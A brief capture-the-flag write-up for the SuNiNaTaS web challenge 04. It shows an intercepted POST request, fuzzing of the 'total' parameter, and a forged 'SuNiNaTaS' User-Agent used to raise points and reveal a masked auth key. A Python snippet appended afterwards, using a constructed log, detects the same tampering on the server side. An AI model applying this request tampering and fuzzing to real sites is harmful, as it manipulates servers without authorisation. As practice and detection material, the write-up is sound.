Suninatas Game 04

Game 04

<!-- Hint : Make your point to 50 & 'SuNiNaTaS' -->
<!-- M@de by 2theT0P -->

I use zaproxy btw

POST http://suninatas.com/challenge/web04/web04_ck.asp HTTP/1.1
host: suninatas.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:147.0) Gecko/20100101 Firefox/147.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
Origin: http://suninatas.com
Connection: keep-alive
Referer: http://suninatas.com/challenge/web04/web04.asp
Cookie: ASPSESSIONIDCCTSAAQT=ONMDDJIBNIEMHLLEJFNAAAOJ // remember this is your session
Upgrade-Insecure-Requests: 1
Priority: u=0, i

total=0 // set fuzz location, numbers from 0->23

// then click plus in browser with the same cookie
get alert
I like the SuNiNaTaS browser!

// move to requester and change User-Agent

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:147.0) Gecko/20100101 SuNiNaTaS/147.0 // changed
...
Cookie: ASPSESSIONIDCCTSAAQT=ONMDDJIBNIEMHLLEJFNAAAOJ

total=25

// notice the points go up
// use fuzz again until point = 50, don't overflow

<td class="table_top"><font size="2"><b>Auth key</b></font></td>
<td class="table_top">***********************</td>
Change your Us3r Ag3ent
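
The same traffic seen from the server side, as an added example that is not part of the original writeup: it flags a session whose User-Agent changes mid-session or that sends a burst of POSTs, which is how the fuzzing and the header edit above would show up in request logs. The log format, session names, timestamps and thresholds are assumptions constructed for this example.

```python
from collections import defaultdict
from datetime import datetime

# User-Agent strings and path as shown in the writeup above.
FIREFOX = "Mozilla/5.0 (X11; Linux x86_64; rv:147.0) Gecko/20100101 Firefox/147.0"
CUSTOM = "Mozilla/5.0 (X11; Linux x86_64; rv:147.0) Gecko/20100101 SuNiNaTaS/147.0"
PATH = "/challenge/web04/web04_ck.asp"


def make_lines():
    """Constructed sample log (tab-separated: time, method, path, session, UA)."""
    lines = []
    # SESSION_A: rapid POSTs with one UA, then the UA changes on the same session.
    for i in range(24):
        lines.append(f"2024-01-01T10:00:{i:02d}\tPOST\t{PATH}\tSESSION_A\t{FIREFOX}")
    for i in range(25):
        lines.append(f"2024-01-01T10:01:{i:02d}\tPOST\t{PATH}\tSESSION_A\t{CUSTOM}")
    # SESSION_B: an ordinary visitor, one page view and one POST a minute apart.
    lines.append(f"2024-01-01T10:05:00\tGET\t/challenge/web04/web04.asp\tSESSION_B\t{FIREFOX}")
    lines.append(f"2024-01-01T10:06:00\tPOST\t{PATH}\tSESSION_B\t{FIREFOX}")
    return lines


def analyse(lines, burst=10, window_s=30):
    """Return {session: set of findings} for UA changes and POST bursts."""
    seen_ua = defaultdict(list)   # session -> distinct UAs in order of appearance
    post_times = defaultdict(list)
    for line in lines:
        ts, method, _path, sid, ua = line.rstrip("\n").split("\t")
        if ua not in seen_ua[sid]:
            seen_ua[sid].append(ua)
        if method == "POST":
            post_times[sid].append(datetime.fromisoformat(ts))

    findings = defaultdict(set)
    for sid, uas in seen_ua.items():
        # A browser does not change its User-Agent halfway through a session.
        if len(uas) > 1:
            findings[sid].add("user-agent-changed")
    for sid, times in post_times.items():
        times.sort()
        # Sliding window: `burst` POSTs whose first and last fall within window_s.
        for i in range(len(times) - burst + 1):
            if (times[i + burst - 1] - times[i]).total_seconds() <= window_s:
                findings[sid].add("post-burst")
                break
    return dict(findings)


if __name__ == "__main__":
    for session, flags in analyse(make_lines()).items():
        print(session, sorted(flags))
```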